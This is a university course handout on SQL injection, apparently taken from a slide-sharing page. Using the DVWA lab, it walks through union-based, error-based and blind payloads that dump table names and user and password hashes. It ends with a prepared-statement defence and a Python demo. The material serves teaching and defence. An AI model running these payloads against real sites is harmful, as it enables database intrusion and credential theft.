University of Craiova
Faculty of Automatics, Computers and Electronics
SQL injection
-course-
Cristian Alexandrescu
Contents
1. Introduction
1.1 Database
1.2 SQL
1.3 Simple queries of SQL
1.4 What are SQL injections?
1.5 What can cause those injections?
1.6 How can SQL injection affect the system administrators (root)?
1.7 How can SQL injection affect the website administrator?
1.8 How can SQL injection affect the website users?
1.9 How can SQL injection affect the web page visitors?
1.10 How can we do SQL injection?
2. Classification
2.1 Union based
2.2 Error based
2.3 Blind based
3. Possible scenario
3.1 Types of SQL queries
3.2 Union based
3.3 Error based
3.4 Blind based
4. Methods of protection
5. Conclusions
Bibliography
1. Introduction
This type of vulnerability has become more frequent on websites over the last years. First we need to understand what the vulnerability is, how it is exploited and how to protect against it.
1.1 Database
A database is a collection of data. From the perspective of a website, the database stores information such as usernames, passwords, web pages, details about the website and much more.
Examples of database engines:
MySQL, MSSQL, Oracle, PostgreSQL, SQLite.
1.2 SQL
SQL stands for Structured Query Language. To communicate with the database we send SQL queries.
1.3 Simple queries of SQL
SELECT * FROM table_name;
This statement returns every column of every row in the table (a client such as the mysql console also prints the column names as a header).
Ex:
SELECT * FROM users;
INSERT INTO users(username, password) VALUES('user', 'pass');
This inserts the values user and pass into the table users, in the columns username and password.
1.4 What are SQL injections?
SQL injection is a technique in which attacker-controlled input becomes part of the SQL queries a web application sends to its database. In the following labs I will show different types of attacks on a website. The malicious SQL fragments are placed in an input that reaches a query, usually a GET or POST parameter, but the same applies to any other value the server builds into a query.
1.5 What can cause those injections?
Through this method an unauthorized person gains access to the website's database and, with it, to all the information stored there.
1.6 How can SQL injection affect the system administrators (root)?
Usually one weakness leads to another, until an attacker manages to get onto the server. From there things change drastically: once a malicious file has been uploaded to the server, the attacker controls the website as well as the server.
1.7 How can SQL injection affect the website administrator?
The website administrator can lose access to the admin panel: the attacker can change the password and the e-mail address stored in the database, so that the administrator can no longer recover the admin panel or the website.
1.8 How can SQL injection affect the website users?
This is the worst part. Once the website has been taken over, its users may receive a notification, apparently from the administrator, telling them to visit an unknown page that carries malicious code disguised as something else, so the users get infected as well.
1.9 How can SQL injection affect the web page visitors?
Assume the server has already been compromised and the attacker has modified the structure of the web page. Every visitor who enters the website can then have their cookies stolen, be infected, and so on.
1.10 How can we do SQL injection?
There is the automated method, with programs such as sqlmap, mole and havij. These are not very effective because they rely on predefined queries: if the injection is complicated they do not know what to do, give up and report the parameter as not vulnerable when in fact it is. The second method is manual injection, which we discuss in this laboratory, together with other possible attacks on a website in the following laboratories.
2. Classification
Three main methods of SQL injection have been identified so far:
2.1 Union based
With this method we first determine how many columns the injected SELECT statement returns, then append the following, which makes the server reflect some of the injected values in the page, and we exploit that in our favour:
union select 1,2,3,4,5,…(as many numbers as the query has columns)
We can obtain information such as: the MySQL version, the database user the application connects with (often something like name@localhost), the database name, the system user, the privileges on the server, as well as any information from the database.
The actual union based queries (everything discussed here is done by hand) are shown in the next section, where I demonstrate a possible attack on a server (in our case the internal lab server).
2.2 Error based
This is the second method of SQLi (SQL injection). Unlike union based, here each query reveals only a single piece of information, carried inside a SQL error message. The error based queries are fairly long, so they are usually kept as templates rather than memorized.
What I want you to remember is that union based and error based extract the same information; the difference is that one is quicker than the other.
2.3 Blind based
The last technique in the series reveals information more slowly than the first two, because the number of queries grows considerably with the amount of data to be extracted from the database.
The queries work like a game of true or false: if the condition is true the server returns the page normally, and if it is false the server returns only part of the page.
I will give examples for each type in the next section, the possible scenario, where I explain in detail every step taken to reach the wanted information in the database.
3. Possible scenario
In this scenario I will use Damn Vulnerable Web App (DVWA), which is written in PHP. This tool was created for teachers, students and anyone who wants to learn more about application security in a classroom environment. I will use it to demonstrate SQL injection.
First of all, whichever of the 3 types we start with, we need to close the existing query fragment correctly so that the SQL we append is executed as we intend.
If we want to see the query that is actually executed, we can add the following line to the PHP page (it echoes the query string into the response):
$html .= '<pre>' . $getid . '</pre>';
3.1 Types of SQL queries
3.1.1 String based
Suppose that we have the following sequence:
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
To execute our own commands we need to close the string correctly so that the appended code is executed. How do we do that? We try something simple: ' (a single quote).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
What does this mean? It tells us we are talking to a MySQL database. Why do we get the error? Let us understand it better:
select first_name, last_name from users where user_id=''';
The extra quote leaves an unterminated string. At the end of the sequence we put --+ (-- starts a comment in MySQL, but only when followed by whitespace; the + is decoded by the web server into a space, which provides it).
(!!! It will also work with --+- or -- -.)
select first_name, last_name from users where user_id=''-- ';
Once we find that id=1'--+ works correctly, we can continue the injection.
3.1.2 Integer based
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
We try the same as last time: ' (a single quote).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
If we send id=1'--+ we get the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''--' at line 1
This means the string based closing does not apply here. What happens if we take out the '? With id=1--+ or even id=1-- the query executes correctly and the page shows no errors or missing text:
select first_name, last_name from users where user_id=1--;
3.1.3 Multiple types
The query may differ from the two types presented above.
It may have to be closed with "--, ')--, )--, ))--, ")--, "))--, '))-- etc.
The query can therefore take many forms; the point is that only one closing sequence will match it.
Some examples of SQL queries:
select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")
3.2 Union based
The following walkthrough covers only the string based and integer based forms.
As the name says, this type of injection uses the SQL UNION operator, which combines the results of two or more SELECT statements, as in the following example:
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
The two SELECTs must return the same number of columns, so we first need that number. We find it with ORDER BY. How does ORDER BY work? It sorts the results of a SELECT:
SELECT column_name, column_name
FROM table_name
ORDER BY column_name ASC|DESC, column_name ASC|DESC;
Given a column number instead of a name it sorts by that column, and fails if no such column exists. So we try order by 1 (if it works we try 2, 3, ... N, where N is the number of columns the query returns).
Let us assume we reach 2 (order by 2).
I tried 2 and it worked; if I try order by 3 we get an error:
Unknown column '3' in 'order clause'
Why do we get an error? Because the query we are injecting into selects only 2 columns.
Now we use union select to inject the commands with which we find the information in the database:
union select 1,2
Why do we write 1,2 instead of 1,2,3,4? As I said before, the query only uses 2 columns:
SELECT first_name, last_name FROM users
We already know the query, but we assume that we do not.
The page displays 1 and 2: both columns are reflected in the output, so either can carry the data we extract.
(!!! If nothing from the injected row is displayed and there is no error, the original row is probably taking up the display slot. Give the parameter a value that matches no record, or negate the original condition.)
For example:
id=1' and 0 union select 1,2--+
id=1' and 1=0 union select 1,2--+
id=-1' union select 1,2--+
id=0' union select 1,2--+
id=99999' union select 1,2--+
We replace one of the reflected columns with version() to learn which MySQL server is running. The purpose is to identify the DBMS version in order to look up known vulnerabilities for it:
union select 1,version()
In my example the result is 5.6.24; on every server it depends on the MySQL version installed. CSIRT advisories and vulnerability databases list the known vulnerabilities for each MySQL version, which can later be exploited with other techniques and tools.
We check the name of the database. The purpose is to find the current database the application runs on:
union select 1,database()
We get the name of the database: dvwa.
Next we list all the tables in the database, in order to identify a table that may hold an administrator account.
We use the following SQL to obtain all tables of the current database: group_concat(table_name) takes the place of database(), and from information_schema.tables where table_schema=database() is appended at the end of the command:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
How does this work?
group_concat() is an aggregate function that returns a single string made by concatenating the non-NULL values of a group, so all table names arrive in one reflected column. information_schema.tables is a system table (a view) listing every table in every database on the server. table_schema is one of its columns and holds the database name, so filtering on it restricts the list to the database we want.
We obtain guestbook and users. To extract information from users we modify the command as follows: we replace table_name with column_name and at the end we write from information_schema.columns where table_name=0x7573657273:
union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
0x7573657273 is the string users written as a hexadecimal literal; for convenience we use the Firefox add-on Hackbar to encode it. We could have written 'users' directly, but the hex literal contains no quote characters, so it still works when the application escapes or filters quotes.
We find user_id, first_name, last_name, user, password, avatar, USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS.
The last three do not belong to dvwa.users: because the query does not filter on table_schema, the columns of every table named users on the server are listed (here MySQL's own performance_schema.users). Adding and table_schema=database() to the WHERE clause removes them.
To output the information from the columns user and password we use the following command:
union select 1,group_concat(0x3c62723e,user,0x3a3a,password) from users
0x3c62723e is <br> in HTML and 0x3a3a is ::, so each record appears on its own line as user::password. We receive the wanted information from the 2 columns (user and password) of the table users.
Suppose instead that we had a table admin with the columns username and password, in a query that returns three columns. The command would look like this:
union select 1,group_concat(username,0x0a,password),3 from admin
Running the query returns the admin account and its password.
If we look closely we see that the password is stored as a hash, probably MD5 or SHA-1, i.e. a one-way function. What does this mean? A hashed password cannot be decrypted, because nothing was encrypted; the only way to recover it is to guess it, with a dictionary attack, rainbow tables or brute force.
3.3 Error based
In this method, as I said before, we obtain one piece of information at a time, carried in an error message. The trick is a group by on a non-deterministic key: floor(rand(0)*2) is evaluated more than once per row while MySQL builds the temporary table for the grouping, so the same key value, which carries the text we placed in concat(), is inserted twice and MySQL reports it in a Duplicate entry error. This means:
and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
Duplicate entry '5.6.24' for key 'group_key'
If we wish to output the name of the database, we replace version() with database():
and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
If we want to reach the tables, we must change the query a little:
and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Duplicate entry '~guestbook' for key 'group_key'
To get the next table we increment the offset in the limit clause.
(!!! If the query works for limit 5,1 but not for limit 6,1, the database has exactly 6 tables. The same rule determines the number of columns or the number of records in a table.)
and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
When we try limit 2,1 we receive a normal web page without any error. Since we extract information through SQL errors, no error means there is no third table: the database named dvwa has only 2 tables.
We can see which columns are inside the table users with the next query:
and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)
where 0x7573657273 = users.
We keep incrementing the limit offset to find the user and password columns, the same as in union based:
limit 1,1
limit 2,1
and so on, depending on how many columns we want to get...
and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 3,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)
The query to obtain the first record of the table users, using the columns user and password, is:
and (select 1 from(select count(*),concat((select concat(user,0x3a,password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
For the next records we modify the limit as in the previous query:
limit 1,1
and so on, depending on how many records you want to get...
3.4 Blind based
This method is encountered very frequently and it is very time-consuming to exploit manually because of the number of queries required.
In the following I will show the method without carrying it through to the end, because that would take a long time even for this small database.
To check whether blind injection is possible, we send a condition that is true, id=1' and 1=1--+; if we get the same page as usual, this can be a blind injection. To be sure we then send and 1=0. If the page now loads with some of its text missing (because 1 is not equal to 0, whereas 1 is equal to 1), the server is answering our questions with true or false: true if the page loads normally, false otherwise.
We ask the server whether its DBMS major version is 4 (although I know it is 5):
and substring(@@version,1,1)=4
Part of the text disappears. Now we try 5:
and substring(@@version,1,1)=5
It loads normally, which means the DBMS is version 5.
To get information out of the database we need to understand how the server answers our queries.
To get the table names we first need the ASCII table. Why ASCII? Because blind injection works by comparing character codes, using the SQL ascii() function.
In the ASCII table we see that:
'a' = 97, 'A' = 65, 'g' = 103
and so on.
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>65
We want to know whether the first letter of the first table name is greater than 'A' (65 in ASCII).
We keep raising the threshold until we get the following result:
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<104
(104 = 'h')
We have almost found the first letter (even though we already know it from union based and error based: the table name is "guestbook"):
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103
For the next letter, u is 117, so we modify the query a little (the second argument of substring is the position of the character):
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=101
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=116
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=98
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=111
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))=111
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))=107
Now we have found "guestbook". I will not repeat the whole process for the table "users", which we already know; the procedure is identical:
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117
and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115
And so on until the end...
Now we know only the name of the table, users, and nothing else. The next part involves guessing column names; we cannot be sure to guess them, but for learning purposes I already know the columns.
We assume there is a column username, so we test whether it exists:
and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1
It seems that username does not exist in the table users.
and (SELECT substring(concat(1,user),1,1) from users limit 0,1)=1
It works, because the web page loads normally. What if we try password?
and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
It works as well. Now we need to find the first column of the table users (usually id or user_id):
and (SELECT substring(concat(1,id),1,1) from users limit 0,1)=1
Unknown column 'id' in 'field list'
and (SELECT substring(concat(1,user_id),1,1) from users limit 0,1)=1
Now we need to find the administrator account and its password:
and ascii(substring((SELECT concat(user) from users where user_id=1),1,1))=97
and ascii(substring((SELECT concat(user) from users where user_id=1),2,1))=100
and ascii(substring((SELECT concat(user) from users where user_id=1),3,1))=109
and ascii(substring((SELECT concat(user) from users where user_id=1),4,1))=105
and ascii(substring((SELECT concat(user) from users where user_id=1),5,1))=110
(admin = 97,100,109,105,110)
and ascii(substring((SELECT concat(password) from users where user_id=1),1,1))=53
and ascii(substring((SELECT concat(password) from users where user_id=1),2,1))=102
We continue in the same way until we have recovered the whole password column.
4. Methods of protection
The defence described in the references below is the prepared statement (parameterized query): the SQL text is fixed when the statement is prepared and the user input is bound to it as a value afterwards, so the input can never change the structure of the query.
http://php.net/manual/en/mysqli.quickstart.prepared-statements.php
http://php.net/manual/en/pdo.prepare.php
https://docs.oracle.com/javase/7/docs/api/java/sql/PreparedStatement.html
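As an added example (not from the course or from the linked manuals), here is the vulnerable lookup of section 3.1.1 next to its parameterized form, written in Python with the standard sqlite3 module, which takes ? placeholders the way PHP's mysqli/PDO and Java's PreparedStatement do. The in-memory users table and its rows are constructed for the demo.

```python
import sqlite3


def vulnerable_lookup(conn, user_id):
    """The pattern from section 3.1.1: the request parameter is spliced into the SQL
    text, so a quote inside it ends the string and the rest is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Prepared statement: the SQL text is fixed and the value is bound separately,
    so the database only ever compares it with user_id and never parses it."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def make_demo_db():
    """In-memory SQLite table shaped like DVWA's users table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
    ])
    return conn


# The course's union payload as it reaches the query (URL-decoded: --+ became "-- ").
UNION_PAYLOAD = "-1' union select user,password from users-- "


if __name__ == "__main__":
    conn = make_demo_db()
    print("normal:       ", vulnerable_lookup(conn, "1"), safe_lookup(conn, "1"))
    print("vulnerable:   ", vulnerable_lookup(conn, UNION_PAYLOAD))  # user/hash pairs leak
    print("parameterized:", safe_lookup(conn, UNION_PAYLOAD))        # []
```

The same payload that dumps user and password hash pairs through vulnerable_lookup() returns nothing from safe_lookup(): the driver sends the statement text and the value separately, so the quote and the union select are just characters compared against user_id. In the PHP of section 3.1.1 this corresponds to mysqli_prepare() with bind_param(), or PDO::prepare() with execute(), as the links describe. Because id is numeric, rejecting anything that is not an integer before the query is a cheap second layer, but it is not a substitute for binding.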
5. Conclusions
As I said earlier in this course, this type of vulnerability is very easy to exploit and is present on many websites today.
SQLi belongs to the web application vulnerabilities that are very easily exploited on small websites whose developers are not prepared to protect the server, the web page and the data against this kind of attack. However, not only small websites have this vulnerability; it is also found on many important websites all around the world.
A student said the following: "If we want to be protected from SQLi we need to set the parameter on POST, because then it would not appear directly on the web page or in the browser URL." To clarify this problem, I asked the following: "Do you think this would be enough to protect you from a possible attacker? Maybe if a script kiddie tried this he would not succeed, but if an experienced hacker targeted your website he would most certainly penetrate it."
(A script kiddie is a person with little knowledge about security who uses tools made by experienced hackers to destroy websites or servers.)
A Web Application Firewall might stop some keywords such as union, select, union select etc., but it certainly cannot protect you from new queries crafted by people experienced in this domain.
As long as SQL exists, SQLi will exist too!
Bibliography
http://securityidiots.com/Web-Pentest/SQL-Injection/Part-1-Basic-of-SQL-for-SQLi.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Error-Based-Injection-Subquery-Injection.html

Sql injection
The Avi Sharma
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Magno Logan
 
Asp
AspAsp

Similar to Sql injection course made by Cristian Alexandrescu (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
SQL injection implementation and prevention
SQL injection implementation and prevention SQL injection implementation and prevention
SQL injection implementation and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
SQL Injection - Newsletter
SQL Injection - NewsletterSQL Injection - Newsletter
SQL Injection - Newsletter
 
Sql
SqlSql
Sql
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attack
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
 
SalemPhilip_ResearchReport
SalemPhilip_ResearchReportSalemPhilip_ResearchReport
SalemPhilip_ResearchReport
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
 
Sql interview question part 8
Sql interview question part 8Sql interview question part 8
Sql interview question part 8
 
Ebook8
Ebook8Ebook8
Ebook8
 
Seminar2015Bilic_Nicole
Seminar2015Bilic_NicoleSeminar2015Bilic_Nicole
Seminar2015Bilic_Nicole
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Web application security
Web application securityWeb application security
Web application security
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Asp
AspAsp
Asp
 

Recently uploaded

Hindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdfHindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdf
Dr. Mulla Adam Ali
 
Solutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptxSolutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptx
spdendr
 
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Leena Ghag-Sakpal
 
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdfIGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
Amin Marwan
 
B. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdfB. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdf
BoudhayanBhattachari
 
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem studentsRHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
Himanshu Rai
 
math operations ued in python and all used
math operations ued in python and all usedmath operations ued in python and all used
math operations ued in python and all used
ssuser13ffe4
 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
Jyoti Chand
 
Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...
PsychoTech Services
 
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxBeyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
EduSkills OECD
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
Priyankaranawat4
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
Nicholas Montgomery
 
The History of Stoke Newington Street Names
The History of Stoke Newington Street NamesThe History of Stoke Newington Street Names
The History of Stoke Newington Street Names
History of Stoke Newington
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
PECB
 
Constructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective CommunicationConstructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective Communication
Chevonnese Chevers Whyte, MBA, B.Sc.
 
ZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptxZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptx
dot55audits
 
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
Nguyen Thanh Tu Collection
 
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptxPengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Fajar Baskoro
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
GeorgeMilliken2
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Denish Jangid
 

Recently uploaded (20)

Hindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdfHindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdf
 
Solutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptxSolutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptx
 
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
 
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdfIGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
 
B. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdfB. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdf
 
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem studentsRHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
 
math operations ued in python and all used
math operations ued in python and all usedmath operations ued in python and all used
math operations ued in python and all used
 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
 
Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...
 
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxBeyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
 
The History of Stoke Newington Street Names
The History of Stoke Newington Street NamesThe History of Stoke Newington Street Names
The History of Stoke Newington Street Names
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
 
Constructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective CommunicationConstructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective Communication
 
ZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptxZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptx
 
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
 
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptxPengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptx
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
